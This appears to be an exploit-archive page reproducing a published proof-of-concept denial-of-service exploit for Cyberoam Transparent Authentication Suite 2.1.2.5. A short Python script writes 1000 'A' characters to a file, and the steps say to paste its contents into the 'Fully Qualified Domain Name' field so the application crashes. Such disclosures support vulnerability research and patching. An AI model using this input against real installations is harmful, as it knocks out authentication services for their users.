cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip #Tested Version: 2.1.2.5 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ctas_fqdn_2.1.2.5.py #2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard #3.- Open Cyberoam Transparent Authentication Suite #4.- Select General > in Domain Type select "Microsoft Active Directory" #5.- In "Fully Qualified Domain Name" paste Clipboard #6.- Click on "Apply" #7.- Crashed! cod = "\x41" * 1000 f = open('ctas_fqdn_2.1.2.5.txt', 'w') f.write(cod) f.close()
Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc) Vulnerability / Exploit Source : Cyberoam transparent authentication suite 2.1.2.5 fully qualified domain name denial of service (poc)